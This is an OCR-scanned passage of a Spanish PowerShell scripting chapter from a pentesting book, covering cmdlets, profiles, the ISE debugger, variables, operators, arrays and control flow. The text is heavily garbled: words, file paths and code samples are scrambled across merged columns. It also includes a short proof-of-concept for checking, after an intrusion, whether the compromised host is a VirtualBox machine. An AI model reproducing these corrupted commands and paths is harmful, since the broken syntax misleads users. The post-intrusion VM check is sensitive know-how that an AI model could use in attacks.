linea de comandos. 


Una de las primeras premisas de la interacción con la línea de comandos de PowerShell es que 
su conjunto de comandos es ampliable. Esto no ocurre con la cmd clásica, en la que para ampliar 
el conjunto de comandos había que desarrollar un programa aparte que sería ejecutado desde la 
terminal. Los comandos binarios nativos de PowerShell! denominados cindlets pueden ser ampliados 
agregándose como complementos. Los complementos en PowerShell se compilan, como ocurre 
con las herramientas binarias de otras interfaces o terminales. De este modo se podrían agregar 
otros providers. Las funciones declaradas son otros comandos que pueden añadirse para ampliar el 
conjunto de comandos de PowerShell, sin necesidad de compilar nada. 


La linea de comandos controla la entrada y la presentación en consola de los resultados. Cuando el 
usuario escribe un comando, éste se procesa desde PowerShell. La consola aplica un formato por 
defecto, el cual es personalizable, a los resultados que se mostrarán por pantalla, Esta funcionalidad 
interna de PowerShell simplifica mucho el trabajo de los cmellets, ya que no se tienen que preocupar 
por el formato de salida. 


PowerShell utiliza sintaxis del lenguaje C# y esto es algo importante a la hora de desarrollar scripts. 
Las palabras clave y funciones de sintaxis son prácticamente idénticas a las que los desarrolladores 
pueden utilizar en C. Esto es debido a la base de PowerShell que es NET Framework. 


Hay un comando especial que permitirá al usuario obtener mucha información sobre qué comandos 
y de qué tipo son los que pueden ser ejecutados en la línea de comandos. El emdler Get-Command 
Proporciona 3 columnas con información sobre lo que el usuario puede ejecutar, 


En la primera columna denominada CommandType se indica el tipo del comando, por ejemplo un 
etin un alias o una función. En la segunda columna se indica el nombre para poder invocarlo. En 
à tercera columna se muestra la definición del comando, es decir, la descripción de como lanzarlo. 
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S Civllsersspablo> Get-Command 


Name Definition 
ForEac 

2 Where 

A: 

ac 

Add-Computer Add-Computer [-DomainNanme]l 

Add-Content Add-Content [-Path] <String 

fidd-Historv Add-History [[-InputObject 1 


Fig. 2.01: Listado de información de Get-Command. 


C 
C 


Personalización del entorno 


Cuando un usuario trabaja diariamente con la línea de comandos de PowerShell es de vital 
importancia tener un entorno con el que el usuario se encuentre cómodo trabajando. Disponer de 
los alias ya cargados, los cmdlets importados o las funciones personalizadas declaradas en un perfil 
es algo que puede ayudar a mejorar la experiencia de trabajo con PowerShell. En este apartado se 
trabajará la modificación del entorno de la línea de comandos de PowerShell y cómo hacer que estos 
cambios o personalizaciones sean persistentes. 


Modificación del entorno 


La modificación básica del entorno está determinada por opciones de configuración, ya sea visual 
como de gestión. Para poder modificar estas opciones se puede hacer clic en la esquina superior 
izquierda de la consola. dónde se puede ver el icono de PowerShell, y aparecerá un menú contextual 
dónde se debe elegir la opción * Propiedades”. 


Opciones | Fuente | Diseño | Colores | 
Tamaño del cursor 
o Pequeño 
ı Medio 
Grand 
Historial de comandos Opciones de edición 
Tamaño del búfer: J| Modalidad de edición rápida 


Número de búferes 4 ~ J| Modalidad de inserción 


Descartar duplicados antiguos 


Fig. 2.02: Propiedades para la personalización del entorno de PowerShell. 


EN c 


En la pestaña opciones se puede elegir el tamaño del cursor, pequeño, mediano y grande. el historial 
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de comandos, definiendo su tamaño de büfer, por defecto en 50 y opciones de edición, para distintas 
modalidades. En la pestaña fuente se puede personalizar la fuente para la línea de comandos y el 
tamaño de ésta. En la pestaña de diseño se puede personalizar el tamaño del búfer de pantalla, es 
decir, el número de líneas que se almacenarán a lo alto de la pantalla, con el scroll, y el número de 
caracteres que se mostrarán en cada línea, a lo ancho de la pantalla. 


Por otro lado, también es personalizable el tamaño de la ventana, anchura por altura. La posición de 
la ventana también se puede elegir indicando, aunque por defecto es el sistema operativo quien la 
ubica. En la pestaña de color se puede personalizar el color del texto en pantalla, el color del fondo 
de pantalla, el texto de las ventanas emergentes y el fondo de dichas ventanas. 


[ Opciones | Fuente T Diseño | Colores | 


Texto de la pantalla 


o Fondo de la partalla os 
Texto de ventanas emergentes Verr C 


Fendo de ventanas emergentes 


HEZTEN SN | NS 


Colores de pantalla seleccionados 


C:NVINDOUS? dir 
SYSTEM «DIR? 10-01-99 
SYSTEM32 <DIR> 18-81-99 


DEANMO TYT caac 1AA aA 


Colores seleccionados para ventanas emergentes 


CONINDOWS> dir 
SYSTEM <DIR> 10-01-99 
SVSTEM32 CDI R5 18-81-99 


DUhnML "vr "ncaoc i A-R aa 


Aceptar || Cancelar 


Fig. 2,03: Personalización de colores en Powershell. 


Para s fu 5i > : j 
: a que los cambios realizados en el entorno sean permanentes se debe abrir la consola de 
ower’ OP D e z . + 
: eod Il como administrador de la máquina. Esto es algo que se debe tener en cuenta, ya que s! 
0,c A Vr * . Š z . " 
ada vez que el usuario ejecute la consola no se almacenarán los cambios. 
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Perfiles 


¿Qué es un perfil en PowerShell? El perfil son varios archivos que indican la configuración y 
personalización con la que la línea de comandos debe arrancar. En PowerShell se puede diferenciar 
entre la shell de sistema y otras shell cargadas con módulos de otros productos. En un sistema 
Windows 7 se tiene por defecto una PowerShell por defecto, y para gestionar Microsoft Exchange se 
tiene otra shell personalizada para el tratamiento de dicho producto. Existen 4 perfiles, jerarquizados 
por 2 tipos, en PowerShell especificados en la siguiente tabla. 


Es un perfil para todos los escenarios dónde 
Usuario 


se ejecuta PowerShell, ya sea shell de 
Usuario 


sistema o shell de otros productos 


Máquina 


$env:userprofilel Mis documentos! 
Windows PowerShell'profile.ps 1 


Senv:userprofileVMis 
Documentos Windows 
PowerShell Microsoft. 
PowerShell profile.ps 1 


Es un perfil para sólo el entorno 
PowerShell instalado por defecto, la sheli 
del sistema 


Perfil para todos los escenarios, y para 
todos los usuarios de la máquina 


Senv:windirsystem32 Windows 
PowerShellv1.0Wprofile.ps 1 
Senvzwindir'system32! Windows 
PowerShellw1.0| Microsoft. 
PowerShell profile.ps1 


Perfil para el entorno PowerShell instalado 
por defecto, que se aplica a todos los 
usuarios 


Tabla 2.01: Tipos de perfiles v rutas en Powershell. 


En arquitecturas de 64 bit la ruta de los perfiles de máquina es la misma, salvo que en vez de ser la 
carpeta System32 es la denominada Syswow64. El flujo de ejecución de los perfiles al arrancar una 
línea de comandos de PowerShell lleva un orden, el cual se puede visualizar a continuación: 

I. Senvowindirisystem32 Windows PowerShellw!.Oiprofile.psl 

2. Senvowindir!system32 WindowsPowerShell v1.0! Microsoft. PowerShell profile.ps 1 

3. Senv:userprofile Mis documentos Windows PowerShell iprofile.ps 1 

4. Senv:userprofile MisDocumentosWindowsPowerShell Microsoft.PowerShell profile.ps1 
Si en el archivo profile.ps1 de máquina existe la instrucción Set-Alias -Name procesos —Value Get- 


Process y existe en el archivo profile.ps! de usuario la instrucción Set-Alias -Name procesos —Value 
-Get-Service, prevalece la última cargada por PowerShell. 


Los perfiles no vienen creados por defecto, por lo que el usuario deberá crearlos a través de 
PowerShell o creando a mano un archivo de tipo .ps/. Se puede utilizar la variable de entorno 
SPROFILE para indicar cuál es la ruta de creación del perfil de tipo usuario. Para crear perfiles de 
máquina se debe arrancar la línea de comandos como administrador. 
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El fichero con el perfil no es más que una serie de instrucciones de línea de comandos, muy similar a 
los perfiles en otras shell. Un ejemplo sería el siguiente código que se puede visualizar a continuación. 


pro 
¿área para alías y variables 
alias procesos -value get-process 
susuario = Senv:username 
sàrea para definición de funciones 
zgnction hora [get-date] 
function prompt (['PS ` + S(get-location) + * Y + fídate) +" >”) 


¿otras áreas útiles para el usuario 

¿mensaje de bienvenida al ejecutar la shell 

Suser = [System.security.principal.Windowsidentity]::GetCurrent[) 
write-host Hola $(S$user.name) , bienvenido a PowerShell 


2. Entorno de Scripting: PowerShell ISE 


PowerShell ISE es un entorno gráfico que permite realizar desarrollo de scripts. Presenta un debugger 
con el que se facilita la manera de trabajar con PowerShell y la automatización de tareas, Este 
entorno se encuentra disponible desde la versión 2.0 de PowerShell, y se puede encontrar instalada 
por defecto desde los sistemas Windows 7 y Windows Server 2008 R2. 


La ruta dónde se encuentra es la misma que dónde se aloja PowerShell, C: Windows'system32: 
WindowsPowerShellw!.0. Para acceder a este entorno: 


- Se puede acceder a Inicio > Accesorios > Windows PowerShell > Windows PowerShell 
ISE. 
- Escribiendo directamente en la caja de búsqueda, es decir, en Inicio > PowerShell ISE. 


PowerShell ISE proporciona al usuario 3 áreas diferenciadas de trabajo integradas en una única 
ventana. El desarrollador tiene un control completo sobre lo que ocurre, además de disponer de la 
ayuda necesarias sobre todos los cmdlers que pueden ser ejecutados. 


Fig. 2.04: Powershell ISE . 
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El área superior, por defecto, corresponde con un editor de texto en el cual se escribirán los script. 
Además, mediante el intuitivo modelo de pestañas, famoso en los navegadores, se dispone de la 
posibilidad de trabajar con distintos script a la vez. 


El área de la parte inferior se corresponde con la salida por pantalla de las ejecuciones. Además, 
el usuario puede ir probando comandos sobre esta consola, aprovechando los valores de ciertas 
variables en un momento dado. Esta consola es de gran utilidad, aunque los cambios que se realicen 
en los providers, como por ejemplo en el provider del sistema de archivos, se harán en realidad en 
el sistema. 


En la parte derecha de PowerShell ISE se puede encontrar la ayuda de los cmdlets agrupados por 
módulos de trabajo. Los módulos de trabajo indican distintas herramientas o productos de Microsoft 
que se tienen en el sistema. De esta manera es muy sencillo saber que cmdlets se pueden ejecutar y 
obtener una ayuda rápida. Esta funcionalidad se añadió en la versión 3.0 de PowerShell. 


El concepto de ficha en PowerShell viene determinado por un entorno personalizado con sus 
variables, alias, funciones, y totalmente aislado del resto de fichas. Cuando un usuario dispone de 
una ficha en PowerShell ISE dónde se dispone de ciertas variables en un estado concreto, cuando 
comienza a trabajar con otra ficha desde ésta no se ven las variables de la anterior. Se puede entender 
el concepto de ficha como una definición equivalente a los ámbitos en un lenguaje de programación. 
Para crear una nueva ficha se puede utilizar un atajo como es CTRL +T en PowerShell ISE. 


| PowerSheli1 PowerSnell4 X 


| Sin titulo4.ps1 X 
1 


PS CAUsersibit> 


Lin. 1 Col. 1 


Fig, 2.05: Fichas en Powershell ISE. 


Las fichas locales son entornos que se están ejecutando sobre la misma máquina local y las fichas 
remotas son entornos que son ejecutados en otras máquinas pero su presentación visual se dispone 
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dónde el usuario se encuentra. Para crear una ficha remota archivo > nueva ficha de PowerShell en 
remoto o la combinación CTRL + Mayüs + R. Se pedirán credenciales para obtener el control de una 
sesión en el entorno remoto a través de PowerShell. 


La ejecución de los scripts y la depuración de éstos es algo muy importante y valioso. Históricamente. 
en un entorno de scripting no se podía debuggear todo lo bien que se necesita, pero esto no ocurre 
con PowerShell ISE. La ejecución de los scripts se produce en una ficha de manera controlada, 
llevándose a cabo de manera completa o línea a línea, incluso instrucción a instrucción, ya que 
pueden existir líneas con varias instrucciones concatenadas. En la parte superior del entorno de 
debugging se encuentra un icono de play, el cual permite que el usuario lance el script que se 
encuentre activo en la ventana. 


Archivo Editar Ver Depurar Ayuda 


adn: «LH F 


al *. a PTS 
| Sin titulot.ps1" | Sprocesospsi X | Ejecutar script (F5). 
Sorocesas-Get-Process 
$procesos 


sort -Descending id  Select-Object -Last 5 


Fig. 2,06: Ejecución de un script con Powershell ISE. 


Una opción interesante es marcar la línea o conjunto de lineas que se quieren ejecutar y pulsar sobre 
el atajo de teclado F8, o bien pulsar sobre el botón play junto al icono del archivo. Tal y como puede 
visualizarse en la imagen este método es valioso para ejecutar parte de lo que le interese al usuario. 


g [T3 


sort -Descending id  Select-Object -Last 5 


Archivo Editar Ver Depurar Ayuda 
DEH Es O A E 


sin títulol.psi* | 


ep E 


Sprocesos.psi X 


lprocesos Get-Process 
write-host powershell 
Sprocesos 


Fig. 2.07: Ejecución selectiva de lineas o instrucciones en Powershell ISE, 


También puede ser interesante ejecutar solo una instrucción y no la línea completa, por lo que se 


-— seleccionar la instrucción hasta antes del pipe, en el caso de ser una línea concatenada de 
comandos, 


tm "à Tw que debe utilizar el desarrollador son los breakpoint. Un breakpoint 
Pu -— = poss de la ejecución de un código de manera intencionada en un lugar 
desterollades à d ^ co d varios breakpoints a lo largo del código, con el objetivo de ayudar al 
wenig ie » "Ld PowerShell ISE presenta este concepto, de manera sencilla e 
ml do E epurar se puede colocar, listar y eliminar los diferentes puntos de ruptura que 
argo del código. 
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Ayud 


a 
T 


Paso a paso por przcedimie 


28 paso por Inst'uccione 


Pas 


Paso a paso pasa salir 


Ejecutar o continuar 
Detener depurador 
Alternar punto de interrupción 
Quitar todos los puntos de interrupción Ctrl+Mayús+F9 


Habilitar todos los puntos de interrupción 


Deshabilitar todos los puntos de interrupción 


Ctrl+Mayús+L 


Mostrar puntos de interrupción 


Fig. 2.08: Puntos de ruptura o breakpoint en Powershell ISE. 


3. Variables 


Las variables son porciones de memoria que almace 
En PowerShell no necesitan ser declaradas previamen 
sencillo crear y dar valor a una variable. Lo ünico que se 
un nombre a la variable precedida del signo 
que se asignará el valor indicado a la derecha del operador. 


Las variables pueden venir precedidas por un tipo d 
sea de un tipo. A continuación se muestra un ejemp 
valor $variable = "soy un texto”. 


Otro ejemplo de variable con tipo de datos explícito sería [int] $ 
puede resultar muy útil para controlar los tipos que Se recogen 
ser interesante forzar al usuario a introducir un número p 
mediante un menú de opciones. 


Las variables almacenan objetos y después pueden ser trata 
creación y asignación de la variable se requiere utilizar los mé 
para invocar a los métodos. En el siguiente ejemp 
$variable.GetType(). 


nan información que puede variar con el tiempo. 
te para poder utilizarlas, por lo que es muy 
debe tener en cuenta es que se tiene que dar 
*— para indicar 


$, y posteriormente utilizar el operador 


e dato y de esta forma forzar a que el contenido 
lo dónde se crea una variable y se le asigna uf 


variable = 10. Este tipo de definición 
de la entrada por teclado. Pu 
or teclado, por ejemplo en la interacci 


das como tal, por lo que si después de 
todos se puede utilizar el operador 
lo se ilustra cómo acceder a los distintos 


Cuando , — quiera mostrar el valor que se encuentra almacenado en la variable se puede 
utilizar el cm et Write-Output, el alias echo o directamente indicando la variable en la línea d 
comandos precedida del carácter $. o 


o tipo 2 (re son las predefinidas y son aquellas que contienen información sobre el entorno 
e PowerShell que se encuentra en ejecución. Estas vari ili 

i 2 ariables son de mucha ut 7 
escribiendo scripts. utilidad cuando se están 


Para visualizar las distintas variables predefinidas del entorno de PowerShell se puede utilizar la 
instrucción /s variable: Hay que recordar que las variables se encuentran en un proveedor o almacén 
al cual se puede acceder de manera sencilla y realizar un tratamiento de sus elementos l 


Variables necesarias en el desarrollo 


El proveedor E variables contiene todas las variables predefinidas y variables creadas por el usuario 
Existen varia » predefinidas muy interesantes para el desarrollo de scripting, proporcionando al 
desarrollador flexibilidad, información y gestión de errores a sus scripts j 


A continuación se presentan diversas variables predefinidas y que son necesarias para el dese 

de scripts en PowerShell. El número de argumentos que se pasa a una función sad n i seid 
si la ültima instrucción se ejecutó correctamente o no o el nümero de — ap de à 
proceso de PowerShell son algunas de las variables que se pueden encontrar — E 


n esta ev SC pet n el usu e nacers a la dea de p g e que ued Sl It r | 
Con es br ve descri )CIO suario pued > ha Erse a | l a le l q p ere t 

o important > resultar e 
uso de este tipo de var iables 


Esta vari > iens : - 
ta variable contiene una lista con los argumentos pasados a una función o 
a un script en su ejecución 


Esta variable indica si la ültima instrucción se ejecutó correctamente o no 


Esta variable indica el primer miembro del ültimo comando tecleado en la 
línea de comandos 


Esta variable indica el último miembro del último comando tecleado en la 
linea de comandos 


Esta varia istr i 
ta variable registra los errores producidos durante la ejecución de la 
sesión 


Esta variable indica el formato en el que se mostrarán los errores 
registrados en $Error 


Variable que almacena la ruta del directorio de inicio del usuario 
Variable que contiene el identificador del proceso de PowerShell 


Tabla 2.02: Ejemplos de variables predefinidas. 


4. Operadores 


Los operadores son fundamentales para un gran tipo de operaciones. Las operaciones y cit 

de comparación, lógicas, etcétera, están presentes en cualquier scrip! que se tenga Se mane n 
ps q a H A p D a 5 

PowerShell aporta un gran nümero de operadores, los cuales se estudiarán en este apartado clasificado 


por categorías. 


Operadores aritméticos 
Los operadores aritméticos son los típicos que se pueden encontrar en € o =] 
programación. Permiten realizar operaciones matemáticas sobre las arcte ns ne à a l 
se pueden encontrar los distintos operadores disponibles en la línea de comandos de PowerShell. 


Tabla 2.03: Operadores aritméticos, 


A continuación se muestra un código sencillo que refleja el uso de un switch, que es una pj 
condicional. con el que en función del operador indicado se realiza una operación : otra. : p 
presentado implementa una calculadora básica, cuyo script recibe 3 argumentos. El primero de 


$ : 5 Maio 
areumentos es el operando 1, el segundo es el operador y el tercero el operando 2. En función del 
valor del argumento 2 se realiza una operación u otra. 


switch (SA 


Operadores de comparación 


es algo común en el desarrollo de scripts, gestion 


La comparación entre operandos , 
caminos que se puede tomar en un código en un instante concreto. Se puede comparar 


de valores, por ejemplo cadenas de texto o números. 


ando distin 
distintos $ 


isti í ec ower: 
A continuación se puede ver los distintos operadores que la línea de comandos de P 


proporciona al usuario. 
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Operador Descripción 
Compara si los valores no son iguales 
Compara si los valores son iguales 


Tabla 2.04: Operadores de comparación. 


El siguiente código muestra dos argumentos que son pasados a un script y se realiza una comparación 
de igualdad para comprobar si son iguales. En el caso de ser iguales se ejecuta una o un bloque de 
instrucciones, mientras que si no son iguales se ejecuta otro bloque de instrucciones. 


( Sargs[0] -e 


echo "Son i 


Otros comparadores que pueden ser utilizados son los genéricos y de expresiones regulares. El 
parametro match permite ejecutar expresiones regulares. las cuales son realmente útiles en temas 
web, por ejemplo. La siguiente instrucción "Hacking match "h[a-z]' devolverá true en el valor de 
la comparación o el matching. 

Los operadores de comparación genéricos permiten comparar cadenas de texto con una expresión 
genérica. Existen 2 parámetros /ike y notlike. El primero es para comprobar la igualdad de la 
comparación y el segundo la desigualdad. Un ejemplo es pablo '—like 'pab*'. El ejemplo devuelve 
true en la comparación. 


Operadores lógicos 


Los operadores lógicos son elementos fundamentales en el desarrollo debido a que permiten 
concatenar o profundizar en ciertas condiciones y comparaciones. A continuación se presenta una 
tabla con los operadores lógicos que pueden ser encontrados en la línea de comandos de PowerShell. 


Operador | Descripción | 


No Lógico 


Tabla 2.05: Operadores lógicos. 


E: Pentesting con PowerShell 


El siguiente código muestra un ejemplo sencillo en el que para poder ejecutar un bloque de 
instrucciones se puede dar una de las dos condiciones o ambas. Para indicar esto se juntan las dos 
condiciones con el operador OR. Gracias a este operador con que ocurra una de las cosas valdría 
para ejecutar el bloque de instrucciones. 


if (( Sargs.Count -eq Xi ) -Or ( Sargs.Count -eq 3 )) 
l 
echo “Número de parámetros correctos" 
) 
else 


i 
echo "./compararLogico.psi <argumentol> [ <arg2> «arg3» ]” 
exit 


Operadores de tipo 

Este operador permite verificar si una variable es de un tipo o no. Puede ser interesante verificar si 
una variable es de un tipo antes de asignar un variable. El operador evalúa la variable es de un tipo 
indicando true o false. Se dispone del parámetro is e isnot para verificar el tipo. 


D An 


Operadores de intervalo 
Este tipo de operador permite representar los valores que hay entre un valor inicial y otro valor final. 
Se representa con 2 puntos *..”. Un ejemplo de operador de intervalo es el que puede verse en el 
siguiente código. 


bo 


alorrinal 


5. Arrays y hash tables 


Un array es una colección de elementos. Tradicionalmente, los arrays han sido definidos como uni 
colección de elementos homogéneos, pero en PowerShell no tiene porqué ser así. Se pueden defi 
arrays con elementos de distintos tipos. 


Los arrays también son conocidos como tablas en PowerShell. 


| 
| 


Capitulo II. Scripting en PowerShell 


Las dimensiones de los arrays 


Las dimensiones en un array indican el espacio dónde se pueden colocar y referenciar los elementos 
En otras palabras, la dimensión se especifica a la hora de la declaración del array. La dimensión 
puede ser un valor N, la cual será representada mediante el uso de corchetes. Los índices de un array 
empiezan por 0, como ocurre en lenguajes como C, y no por 1. 


Hay distintas maneras de declarar un array, en una se necesita especificar la dimensión el array 
y en otra basta con declarar una variable y asignar valores de un tipo. Por otro lado si se requiere 
especificar un array de varias dimensiones se debe especificar el número de dimensiones mediante 
el uso de corchetes. A continuación se muestra código de ejemplo que sirve para declarar y utilizar 
arrays. 

int1]]$miArray = 22,12,1986 
smiArray2 = 1983,1986,1987 
int 1] []]5miArray3 = 8((14,22,2008), (1,2,3)) 
*multiTipo (int]l1,Idouble]9.5 
5multiTipo 


Tratamiento de datos 


Insertar elementos en un array es uno de los pasos importantes en el uso de este tipo de estructuras 
de datos, En PowerShell se puede insertar elementos dentro de un array de manera sencilla, y 
similar a otros lenguajes de programación. El uso del operador *+=" permite añadir un elemento a un 


array cuando éste tiene una dimensión. Como ejem se ¡evi ins o 
E sjemplo se presenta la siguiente instrucción $miArray 


Cuando se dispone de un array con varias dimensiones hay que indicar a que fila se quiere añadir el 
elemento. Como ejemplo se presenta la siguiente instrucción $mi4rray3/0] += @(2012)). También 
se puede requerir en un momento dado la inserción de una nueva fila para ello se dele aiiiar el 
operador *+=" como si se añadiese un elemento sobre una fila ya existente. l 
miArray3 += At (15,9, 27009) ) l 

miarr iy 5 


n 


Para le 
er los valores de ; 
A s de un array se debe especific: diante c e jsició Te 
se quieren recuperar. 4 pecificar mediante corchete la posición o posiciones que 


imiarray 
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L6 1 Pentesting con PowerShell 
i 6. Los cmdlet de salida 


La redirección a ficheros y a otros elementos es algo importante en el scripting. La linea de comandos 


Smiarrayl0] de PowerShell proporciona al usuario la vía para controlar la salida de datos. Los cmellets encargados 


0 de controlar la salida de datos transforman éstos en algún tipo de texto, 

$miarray[0..S5mierray. Length] 

0 Los emdlets comienzan por el verbo Out y después del guion el nombre hacia dónde envían la 
s información. El primer &mdlet que se explica es el de Out-Host, el cual envia datos hacia fuera de 
Smiarray3[0] [2i PowerShell. En el siguiente ejemplo se muestra un listado de servicios que son tratados por Out- 
2008 Host. Con el parámetro —paging, el propio cmdler va a paginar la información para que sea cómoda 
Leer la información de un array es importante, sobre todo si éste tiene varias dimensiones. El primer su lectura. 

corchete es la fila, mientas que el segundo es la columna. Cuando se disponen de más dimensiones | S C:NUsersNpablo? Get-Service ! Out-Host -Paging 


se van anexando los corchetes con el fin de referenciar al resto de valores. Como ejemplo se propone 
una variable Sarray con 2 dimensiones. Al inicializar el array se crearon 2 filas con 3 A, 
por lo que para referenciarlas se utiliza en el corchete los valores 0 y L Tee oe -— >. 
que representa la columna puede tomar los valores 0.1 y 2. Para la modificación de anios a 2^ e 
utilizar el método SerValue o directamente como se realiza en algunos lenguajes de programación. 


Name DisplayName 


fieLookupSuc Experiencia con aplicaciones 
ALG Servicio de puerta de enlace de niv. 
fippIDSuc Identidad de aplicación 


fippinfo Infornación de la aplicación 

fippMgmt Administración de aplicaciones 
aspnet_state ASP.NET State Service 
AudioEndpointBu... Compilador de extremo de audio de $... 


2000 AudioSru fiudio de Windows 

a fixhutolfntSru Alcohol Virtual Drive fiuto-nount Se... 
,14,2014 ESPACIO» página siguiente; <RETORNO> línea siguiente; Q salir 
1lue (10,0) 


Fig. 2.09: Paginación de salida con el cindlet Out-Host. 


ELemdlet Qut-Null tiene un comportamiento similar a /dev/null. el cual en sistemas Linux representan 
a un periférico nulo. Este cudlet no evita que los mensajes de error se muestren por pantalla. Este 
cmdlet se ha diseñado con el fin de descargar cualquier entrada que se reciba, por lo que si se ejecuta 


eS ME —' > -ay se puede utilizar la opción 
e iere llevar a c la eliminación de un elemento de un array se pt aie ; 
Si se quiere llevar a cabo V: j la instrucción Ger-Process | Out-Null, no se mostrará nada por pantalla. 


de sobrescribir dicha variable o elemento. PowerShell no dispone de un método para eliminar 


; Cita » a llevara cabo esto $4rray = $Array[0..2 * 4]. ; — : . ` de 
elementos. A continuación se muestra un ejemplo para llevar a cal i vi El emdler Out-Printer permite al usuario utilizar la impresora predeterminada. Se puede utilizar otro 


tipo de impresora especificando el nombre de ésta. Un ejemplo de ejecución sería Ger-Process | Oul- 
Printer -Name “Microsoft Office Document Image Writer”. 


Tablas hash 


Las tablas hash o tablas asociativas también están disponibles como estructura de datos en 
PowerShell. Las tablas hash se diferencian de los array en que los valores se referencian ci 
una clave en lugar de un índice. Se debe tener en cuenta que como ocurre con los wp el -—— 
puede utilizar tipos de datos heterogéneos. A continuación se muestra un código dónde e" — 
variable de tipo hash y se inicializa con valores con el formato clave, valor. Hay bas ET en cu 

que si el hash o clave dispone de espacios hay que referenciarlo entre comillas simples. 


El emdlet Our-File permite enviar el resultado de la ejecución de los comandos a un archivo. Por 
ejemplo, se puede ejecutar la siguiente instrucción Ger-Process | Qur-File —FilePath <ruta del 
archivo>, Es conveniente utilizar los emelets Format-* para preparar la salida como más interese al 
usuario, Además, otra de las cosas a tener en cuenta es que Ow/-File crea un archivo con encoding 
de Unicode. Con el parámetro -Encoding se puede modificar este comportamiento por defecto 
indicando el encoding en el que se quiere el fichero resultante. 


1 
j 198€ 


ihashl = 22; hash? 


7.Condicionales 


Los condicion 
función de 


hash2 1986 
hashi 22 
5tablaHash[| ‘hashi’ ] 


ales permiten bifurcar la ejecución del script en función de unas condiciones. En 
as comentadas condiciones el scrip; puede tomar un camino u otro en su ejecución, 
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as condiciones son ciertas o no. Las estructuras condiciones son la base 


dependiendo de si una o vari 
y en general de cualquier lenguaje de programación. 


para el desarrollo de scripts, 


La sentencia If 


La sintaxis de la sentencia i/'es realmente sencilla y muy intuitiva, ya que por lo general es similar en 
todos los lenguajes de programación, y además. es similar a cómo actúa el ser humano ante ciertas 
circunstancias. A continuación se muestra un pequeño ejemplo en pseudocódigo. 


Si condición 
Bloque de instrucciones A 
Si No 


Bloque de instrucciones B 
Fin Si 


el condicional se presenta el siguiente ejemplo dónde un 


Para entender mejor el funcionamiento d 
i el usuario introduce un 1 habrá acertado el valor que 


usuario pide a otro que introduzca un 0o1.S 
el otro usuario había pensado. 


( un valor entre y 1 
and (Sopeion -ne 0)) 
Write-Host No has introaucido zn alor entre 0 y 1 
Exit 
I 
ElseIf(Sopclon -eq 1) 
Write-Host Has aciviz el nümer 
) 
Write-Host No nas a¿divinaat ] númer: 


El condicional de selección: Switch 

El condicional de selección switch optimiza la implementación d 
escenarios. Esta sentencia es sencilla y muy flexible que permite agrupar 
instrucciones bajo una expresión concreta y sencilla. 


e la estructura if en alguno 
varios bloques 


La sintaxis que presenta switch es intuitiva y fácil de recordar cómo se puede visualizar en 
siguiente ejemplo en pseudocódigo, traduciendo switehra 'en caso de”. 
En caso de variable 


Valori Bloque Instrucciones 1 


gN- 
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Valor2 Bloque Instrucciones 2 


ValorN Bloque Instrucciones N 
Defecto Bloque Instrucciones Defecto 


Fin En caso de 


A continuación se propone un ejemplo básico de creación de un menú para un script. Este menú 
mostrará las posibilidades que el usuario puede ejecutar en el script y solicitará a éste que introduzca 

4 5 . . t£ v 
una opción. C uando el usuario introduce una opción concreta, el condicional switch ejecutará un 
ploque de instrucciones en función de la opción elegida. 


- Menü 


" 


directorio 


hora" 


PoC: CheckV Box 


En algunas ocasiones el pentester, tras realizar la intrusión, se encuentra en una máquina virtual 

m es interesante tenerlo controlado, por ello en Metasploit existe un yoiintuesuitriten 

^ > : : aM M q si la sesión se está ejecutando en algún tipo de máquina 
. ya sea Y, . Virtual Box, Virtual PC, Hyper-V, QEmu, etcétera. 


En esta prueba de c a : 

e mu a p concepto se va a implementar una parte de dicho script con el objetivo de identificar 

NES 9 à que accedió el pentester es una máquina virtual. En este caso se va a evaluar si el 
0 pertenece a una máquina virtual corriendo en Virtual Box. " 


A continua ció SE r; e S B V Ss r V 
ación se IS afi jÓ i p Ss 
muestra la función implementada, en ella sep uede /er diferentes fo mas que ha 


que evaluar, para d i i 
`P etectar si el sistema operativo está siendo ejecute d : 
Virtual Box. a operativo está siendo ejecutado en una máquina virtual de 


$vbox = Sfalse 
Get-Proc Y e 

Brust rc a AQUA ESA Dr qui A 
$key = Get-Chilálter E o EESE l 


HKLM: \EARDWARE\ACPI\DSDT” 
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v.Name.EndsWich("VBOX N93 


M:NHARDWARENACPTN FADT* 
")j 
Svbox = $true 
$key = Get-ChildItem -Path ‘HKLM: NHARDWARENACEINRSOT"' 
if (Skey.Name EndsWith("VBOX  ")) 
(i 
$vbox = Strue 


$key = Get-Childirtem -Path SHELM: \HARDWARE\ DEVICEMAP\SCSi\Scsi Port 0\Scsi Bus 
ONTarget Id 0” 


if (Skey . Get Value ("Identifier") ToString().StartsWith "VBOX")) 


IARDWARENDESCEIPTION r 


1) ¿LartaRith (*VBOZ") ) 


Al principio de la función se da por hecho que la máquina sobre la que se ejecuta no es una Virtual 
Box. Se irán haciendo distintas pruebas para comprobar que esto no es cierto. El primer tipo de 
prueba que se realiza es listar los diferentes procesos que ejecutan en la máquina y verificar l 
existencia de dos procesos clásicos de esta plataforma, como son VBoxTray y VBoxService. 


aves de registro en HKLM: ¡HARDWARE! 


El segundo tipo de prueba evalúa la existencia de unas cl 
de prueba se evalúa que en otras 


ACPI, las cuales deben finalizar en VBOX_. Para el tercer tipo 
rutas del registro existan unos valores que comiencen por VBOX. 
esarrollado en PowerShell 3.0 en un equipo Windows 


nte un valor booleano, indicando false si no se 
ando en un entorno de virtualización 


Hay que tener en cuenta que el script ha sido d 
8. La salida que produce esta función es sencillame 
ejecutando en una máquina Virtual Box, o true gi se está ejecut 
como el mencionado. 


8. Bucles 


Los bucles son sentencias de código que se ejecutarán varias veces en función de una 0 
condiciones. Los bucles son utilizados para no escribir repetidas veces el mismo código. 
PowerShell se disponen de varios bucles, los cuales se pueden utilizar en diferentes ámbi 
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contextos. En este apartado se estudiarán los diversos bucles de los que se cuentan en la línea de 
. "my > : . qe " e 
comandos de PowerShell, y se podrá seguir su comprensión con varios ejemplos 


For 
El bucle for itera un cierto número de veces, cuyo valor es conocido desde el principio y no debe 
cambiar durante su ejecución. Es muy utilizado para recorrer listas y estructuras de datos como los 


array. 

El funcionamiento que tiene un bucle for es el siguiente: 
- Seevalüa el inicio, normalmente es la inicialización de una variable. 
- Se evalúa la condición, cuando ésta sea falsa se termina el bucle. 
- Sila condición es verdadera, se ejecutan las instrucciones. 


- Laesxpresión se incrementa y se vuelve a evaluar la condición. 


Su sintaxis es sencilla y es la mostrada a continuación. 
Para (inicio; condición; incremento) 
Bloque de instrucciones 


Fin Para 


` r 


ray = ‘primero’, ” segundo" , 'zercerc 


|; $1 le a y Length; Si++) 


Foreach 


